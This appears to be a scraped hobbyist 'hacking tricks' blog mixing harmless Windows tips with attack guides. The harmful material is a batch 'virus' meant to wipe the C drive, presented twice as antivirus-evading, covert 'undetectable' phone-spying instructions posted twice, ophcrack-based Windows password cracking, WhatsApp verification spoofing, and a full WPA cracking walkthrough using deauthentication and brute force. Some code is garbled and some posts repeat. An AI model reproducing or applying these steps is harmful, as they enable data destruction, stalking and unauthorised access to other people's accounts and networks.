5

Thursday 3 September 2015

Windows Best Run Commands List

Accessibility Options : access.cpl
Add Hardware : hdwwiz.cpl
Add / Remove Programs : appwiz.cpl
Administrative Tools : control admintools
Automatic Updates : wuaucpl.cpl
Wizard file transfer Bluethooth : fsquirt
Calculator : calc
Certificate Manager : certmgr.msc
Character : charmap
Checking disk : chkdsk
Manager of the album (clipboard) : clipbrd
Command Prompt : cmd
Service components (DCOM) : dcomcnfg
Computer Management : compmgmt.msc
DDE active sharing : ddeshare
Device Manager : devmgmt.msc
DirectX Control Panel (if installed) : directx.cpl
DirectX Diagnostic Utility : dxdiag
Disk Cleanup : cleanmgr
System Information : dxdiag
Disk Defragmenter : dfrg.msc
Disk Management : diskmgmt.msc
Partition manager : diskpart
Display Properties : control desktop
Properties of the display (2) : desk.cpl
Properties display (tab “appearance”) : control color
Dr. Watson : drwtsn32
Manager vérirficateur drivers : check
Event Viewer : Eventvwr.msc
Verification of signatures of files : sigverif
Findfast (if present) : findfast.cpl
Folder Options : control folders
Fonts (fonts) : control fonts
Fonts folder windows : fonts
Free Cell : freecell
Game Controllers : Joy.cpl
Group Policy (XP Pro) : gpedit.msc
Hearts (card game) : mshearts
IExpress (file generator. Cab) : IExpress
Indexing Service (if not disabled) : ciadv.msc
Internet Properties : inetcpl.cpl
IPConfig (display configuration) : ipconfig / all
IPConfig (displays the contents of the DNS cache) : ipconfig / displaydns
IPConfig (erases the contents of the DNS cache) : ipconfig / flushdns
IPConfig (IP configuration cancels maps) : ipconfig / release
IPConfig (renew IP configuration maps) : ipconfig / renew
Java Control Panel (if present) : jpicpl32.cpl
Java Control Panel (if present) : javaws
Keyboard Properties : control keyboard
Local Security Settings : secpol.msc
Local Users and Groups : lusrmgr.msc
Logout : logoff
Microsoft Chat : winchat
Minesweeper (game) : winmine
Properties of the mouse : control mouse
Properties of the mouse (2) : main.cpl
Network Connections : control NetConnect
Network Connections (2) : ncpa.cpl
Network configuration wizard : netsetup.cpl
Notepad : notepad
NView Desktop Manager (if installed) : nvtuicpl.cpl
Manager links : packager
Data Source Administrator ODBC : odbccp32.cpl
Screen Keyboard : OSK
AC3 Filter (if installed) : ac3filter.cpl
Password manager (if present) : Password.cpl
Monitor performance : perfmon.msc
Monitor performance (2) : perfmon
Dialing Properties (phone) : telephon.cpl
Power Options : powercfg.cpl
Printers and Faxes : control printers
Private Character Editor : eudcedit
Quicktime (if installed) : QuickTime.cpl
Regional and Language Options : intl.cpl
Editor of the registry : regedit
Remote desktop connection : mstsc
Removable Storage : ntmsmgr.msc
requests the operator to removable storage : ntmsoprq.msc
RSoP (traduction. ..) (XP Pro) : rsop.msc
Scanners and Cameras : sticpl.cpl
Scheduled Tasks : control schedtasks
Security Center : wscui.cpl
Console management services : services.msc
shared folders : fsmgmt.msc
Turn off windows : shutdown
Sounds and Audio Devices : mmsys.cpl
Spider (card game) : spider
Client Network Utility SQL server : cliconfg
System Configuration Editor : sysedit
System Configuration Utility : msconfig
System File Checker (SFC =) (Scan Now) : sfc / scannow
SFC (Scan next startup) : sfc / scanonce
SFC (Scan each démarraget) : sfc / scanboot
SFC (back to default settings) : sfc / revert
SFC (purge cache files) : sfc / purgecache
SFC (define size CAHC x) : sfc / cachesize = x
System Properties : sysdm.cpl
Task Manager : taskmgr
Telnet client : telnet
User Accounts : nusrmgr.cpl
Utility Manager (Magnifier, etc) : utilman
Windows firewall (XP SP2) : firewall.cpl
Microsoft Magnifier : magnify
Windows Management Infrastructure : wmimgmt.msc
Protection of the accounts database : syskey
Windows update : wupdmgr
Introducing Windows XP (if not erased) : tourstart
Wordpad : write
Date and Time Properties : timedate.cpl

Install Backtrack on any Android Device

 

 

Video:- https://youtu.be/ipU2h1u5Ehw



I found this amazing tutorial which will let you install the easy hacking operating system for hacker i.e "BackTrack 5" on an Android Device.

The most important thing was that they installed Backtrack using a VNC option. In this you don't have to change your origina operating system and can access backtrack like an application only. If you know linux you can probably write small script to run the backtrack 5 on your android device.

Description: Backtrack is a very popular linux distribution for penetration testing. It has hundreds of tools for pentesting and hacking. Now a version of backtrack is available for arm processor devices. Normally android based mobile devices uses arm processor so we can install arm version of backtrack on android devices.

This video explains very clearly step by step method of installing process of arm version of backtrack on android devices. Following are the steps and utility for the installation process.

1. Download terminal emulator,android vnc and arm version of backtrack.
2. Extract the content of img file and transfer it in to memory of android devices.
3. Install BusyBox and start it.
4. Open terminal emulator. use "cd" command to get in backtrack directory where extracted content is saved on memory card of device. In this case command is
cd /sdcard/BT5
5. Type "sh bootbt" and we will be in Backtrack.

Monday 31 August 2015

How to use android keylogger for hacking.....

Android Keylogger

Hello friends Today I am going to show you android hacking application An keylogger type monitoring application .

Let Me tell about what is a keylogger?

A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a small program that monitors each keystroke a user types on a specific keyboard. Keyloggers are used to Record System events: Power offs, SD cards removal, USB connections, WiFi connections.

Now what is Android Keylogger(Kidlooger.apk Apps)?


What is Kidlooger?

KidLogger free application used to track phone coordinates by GPS or Wifi records and uploads incoming/outgoing calls and photos taken by the target phone. its Undetectable. It is not visible for any antivirus.you can uploaded to your online account. you can keep a watch your Android with KidLogger.


Benefits Of Using Android Kidlooger?

Kidlooger is a safe and invisible spy tool by which you can know every activity of a target android mobile phone. With the help of kidlooger, you can log on to computer to check the text messages in detail, calls in and out, even the websites visited by the android mobile phone. And android keylogger has the ability to track the location of the phone any time via GPS

DOWNLOAD Kidlogger

From Here :- http://kidlogger.net/download.html

Installation Steps :

Step 1: Install APK file ( KidLogger.apk )

Step 2: Open KidLogger Application

Please note:

- ON TABLETs install Tkeyboard.apk in order to open control panel, see below.

Step 3: On the KidLogger control panel

open settings > upload
and enter device ID from your KidLogger.net account dashboard.
click Send Test Report.
Ensure status is OK.
on the main screen click "Start Log"
click "Back" to leave KidLogger app running on the background.

Done!

How to install Keyboard recorder

KidLoggerKeyboard.apk - virtual on-screen keyboard. replaces original keyboard and allows to record into KidLogger log all keystrokes.

Step 1: Install KidLoggerKeyboard.apk

Step 2: go to Phone Settings > "Language & Keyboard" > enable "SoftKeyboard PRO" input method.

Step 3: Open "SoftKeyboard PRO setting"
- CheckInput Languages to enable more Input Languages in on-screen keyabord if you use a few one.

- enter *123456# in order to open Kidogger control panel ( in case you have a Tablet)

Step 4: In a web browser - a long-click (click and hold your finger 2 sec) over an Address Field > choose "Input Method"
choose "SoftKeyboard PRO".

Done!

Now all typed text and keystrokes on this keyboard will be recorded to the log within KidLogger App.

Also other phone activities are now logged into the log files separated by days.

How to remove it :

Step 1: Open Settings > Applications > find KidLogger in the list and click Remove.

Step 2: the same for Soft Keyboard PRO..
Adroid Keylogger

Hello friends Today I am going to show you android hacking application An keylogger type monitoring application .

Let Me tell about what is a keylogger?

A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a small program that monitors each keystroke a user types on a specific keyboard. Keyloggers are used to Record System events: Power offs, SD cards removal, USB connections, WiFi connections.

Now what is Android Keylogger(Kidlooger.apk Apps)?


What is Kidlooger?

KidLogger free application used to track phone coordinates by GPS or Wifi records and uploads incoming/outgoing calls and photos taken by the target phone. its Undetectable. It is not visible for any antivirus.you can uploaded to your online account. you can keep a watch your Android with KidLogger.


Benefits Of Using Android Kidlooger?

Kidlooger is a safe and invisible spy tool by which you can know every activity of a target android mobile phone. With the help of kidlooger, you can log on to computer to check the text messages in detail, calls in and out, even the websites visited by the android mobile phone. And android keylogger has the ability to track the location of the phone any time via GPS

DOWNLOAD Kidlogger

From Here :- http://kidlogger.net/download.html

Installation Steps :

Step 1: Install APK file ( KidLogger.apk )

Step 2: Open KidLogger Application

Please note:

- ON TABLETs install Tkeyboard.apk in order to open control panel, see below.

Step 3: On the KidLogger control panel

open settings > upload
and enter device ID from your KidLogger.net account dashboard.
click Send Test Report.
Ensure status is OK.
on the main screen click "Start Log"
click "Back" to leave KidLogger app running on the background.

Done!

How to install Keyboard recorder

KidLoggerKeyboard.apk - virtual on-screen keyboard. replaces original keyboard and allows to record into KidLogger log all keystrokes.

Step 1: Install KidLoggerKeyboard.apk

Step 2: go to Phone Settings > "Language & Keyboard" > enable "SoftKeyboard PRO" input method.

Step 3: Open "SoftKeyboard PRO setting"
- CheckInput Languages to enable more Input Languages in on-screen keyabord if you use a few one.

- enter *123456# in order to open Kidogger control panel ( in case you have a Tablet)

Step 4: In a web browser - a long-click (click and hold your finger 2 sec) over an Address Field > choose "Input Method"
choose "SoftKeyboard PRO".

Done!

Now all typed text and keystrokes on this keyboard will be recorded to the log within KidLogger App.

Also other phone activities are now logged into the log files separated by days.

How to remove it :

Step 1: Open Settings > Applications > find KidLogger in the list and click Remove.

Step 2: the same for Soft Keyboard PRO..

Hacking Window 7 Password Using Ophcrack


In this tutorial i will teach you to hack Window 7 password using free open source software called ophcrack. This hack also works on Windows XP and Windows Vista. So let get started.

What Is Ophcrack ?

Opcrack is an open source windows password cracker based on rainbow tables. It comes with Graphical user interface(GUI) and runs on multiple platform such windows, linux and mac.  It allows you to recover or hack windows password.

How To Crack Windows 7 Password Using Ophcrack ?

Before you start doing this you will need a blank CD or DVD to burn the live image of ophcrack.

  1. Download Opcrack Live Cd by Clicking Here.
  2. Download windows xp or windows 7 live cd depending on platform you are wishing to hack. For example:
  • Windows 7 or Windows Vista: Click on ophcrack Vista/7 LiveCD.
  • Windows XP: Click on ophcrack XP LiveCD.
  2. Now burn the live image on to the cd.
  3. Insert the disc into drive and restart you computer.
  4. If everything goes right you will see screen like below.
window7 password hacking

  5. After you see screen like above wait for ophcrack to boot automatically or you may press Enter to advance.
  6. Now you will see several lines of code printed on screen or they might disappear very quickly (you dont need to worry about that).
  7. Then you will see screen like below it is ophcrack password recovering software. At the Ophcrack screen it shows the Administrator and Guest account. Notice the word “empty”. This means that if the account is enabled you could log in without a password.
Windows 7 Password hacking
  8. Ophcrack WILL NOT CRACK THE PASSWORD because the hash table which it needs is not available for free. But it does show the NTLM hash.
  9. Copy this hash value which is under NT Hash field.
 10. Navigate to http://crackstation.net/ which is an online hash cracking tool.
 11. Type in the hash value you copied down in Step 9, Enter the captche and click on Crack Hashes.

Send WhatsApp message without using any number

 In this post, I'll tell you how can you use WhatsApp without using your mobile number, i.e. WhatsApp without using any number. Friends, you might be knowing that Facebook has launched web version of the WhatsApp currently for the chrome browser
which is becoming very popular day by day.

For messaging anyone without using any number, do the following steps:
Steps:
  • Uninstall WhatsApp from your Android phone.
  • Download and install WhatsApp again.
  • Block all messaging services on your phone. Keeping your phone to flight mode will automatically block all messaging services.
  • Now open WhatsApp and Enter your number. In such case WhatsApp will accept numbers, but will not be able to send any verification message.
  • WhatsApp verification is not yet done, so users will not be able to use it.
  • Now WhatsApp wil ask you for alternate method of verification. Click on 'Verify through SMS' option and provide your email address.
    Press Send button and within 2 second, press Cancel button. This will stop the authorization process.
  • Now another app Spoof Text Message will be needed to spoof the message.
  • This app will ask for some details. Use below details :
    • To: +447900347295 
    • From: + (country code) ( mobile number) 
    • Message: Your e-mail address

Now, your message will be sent from a spoof number and you can chat with your Friends with this spoofed number.

Monday 24 August 2015

Learn To Make Dangerous Virus In A Minute


computer virus
In my previous post i had teach you guys to create virus that disable mouse and Virus to format Hard Disk. In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

   1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Enable God Mode In Windows 7 And Vista

windows 7 god mode

In this tutorial i will show you to enable God Mode in Windows 7 and Windows Vista. By enabling God mode you can access all your windows setting from one folder and it makes really easy to access and change windows settings. This work 32 as well as 64 bit operating system. So lets enable God mode on your computer.

How to do it ?

  1. On your desktop right click and create a New Folder.
  2. Rename this folder to the code given below.

GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

  3. Done now double click on this folder and you will have access to all your windows operating system settings.

Learn To Hide Files Behind The Images


hide files behind images

There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but in todays tutorial i will change this by teaching you a interesting trick to hide files behind images.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started.

How To Hide File Behind Image ?

In order to do this you should have basic understanding of command line, but if you don't know check out  tutorial given below.
1. Select an image to be used for hiding file behind the image.
2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
3. And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.
4. Now open cmd by going to Start > Accessories > Command Prompt and type following commands in it.
cd desktop
hide files behind images

5. CD stands for change directory by typing above command you change your directory to desktop. After that type command given below.
 Copy /b imagename.jpg + filename.rar finalimage.jpg
hide files behind images
  • Replace imagename.jpg with the name of image you want your file to be hidden behind. Don't forget to add image format (Eg: .jpg,.png,.gif)
  • Replace filename with name of your file you want to hide. It must be in .rar format.
  • Finally Replace finalimage.jpg with whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.
6. Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

How To Access Hidden File ?

To access your hidden file you need to open the newly created image in winrar. Just follow simple steps given below to do that.
    1. Open winrar
    2. Now locate your image and open it or simply drag your image in winrar.
    3. Extract the file and done.

Thursday 20 August 2015

Create A Undeletable And Unrenamable Folders In Windows


creating undeleteable files
In this tutorial you will learn cool and simple trick to Create an undeletable and unrenamable Folders In Windows operating system. Most of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software. To Test this concept just follow simple steps given below.

Try to make a new folder in windows & give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be allowed to create folder with above mentioned names, Because they are reserved words in windows.

How To Create Undeletable And Unrenamable Folders ?

  1. Go to Start and then Click on Run
  2. Type cmd & hit enter (To open Command Prompt ).
  3. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
  4. Type D: or E: and hit enter
  5. Type md con\ and hit enter (md - make directory)
  6. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
  7. Open that directory, you will see the folder created of name con.
  8. Try to delete that folder or rename that folder windows will show the error message.

How to delete that folder ?

It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.
  1. Open Command Prompt
  2. Type D: ( if u created this type of folder in D: drive) & hit enter
  3. Type rd con\ (rd - remove directory)
  4. Open that directory and the folder will not appear because it is removed.

Password Protect Any Folder Without Any Software


In my previous post i have teach you to hide files behind images. In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.

How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is coolhacks)
  • To change the password replace coolhacks with  new password in the above code

How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

Tuesday 17 March 2015

WARNING:Don't Hack any authorized router,otherwise you'll be put into jail.  


 certain things to be followed..such as creating virtual machine!!!running in your OS if you have windows..!!


HACK WIFI PASSWORD WITH BACKTRACK 5
  •  press enter......go on

HACK WIFI PASSWORD WITH BACKTRACK 5


  •  At BOOT Menu....just type startx
HACK WIFI PASSWORD WITH BACKTRACK 5


  • an Now your all set to go...just simply follow below steps...now  
HACK WIFI PASSWORD WITH BACKTRACK 5

Rules to Follow

    • A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
    • here a link to download it http://www.backtrack-linux.org/downloads
    • I highly recommend you to download backtrck 32 bit version coz it runs smoothly...in win7 64bit through vmware workstation.......... /
    • A nearby WEP-enabled Wi-Fi network 
    • Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.                                            

 Steps to Follow:
Step 1 :
airmon-ng

The result will be something like :
Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step 2 :
airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step 4 :
airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step 5 :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.
aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :
airmon-ng

The result will be something like :
Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step b :
airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step d :
airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step e :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.
apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download 
crunch 3.0 (the current version at the time of this writing).http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


Step i :

Go to the official site of pyrit.
http://code.google.com/p/pyrit/downloads/list

Download 
pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install


Step j :
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the 
wpacrack-01.cap, you should do the following step.pyrit -r wpacrack-01.cap -o new.cap stripLive
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.


Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :
airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0
Make sure pyrit workable on your system :pyrit list_cores

That's all! See you. 
THANK YOU AND plz follow me in blog.............
                                       By- Shubham Chaudhari

Learn To Make Dangerous Virus In A Minute.....

What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.

How to Make the virus ?

   1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
                                                         By- Shubham Chaudhari.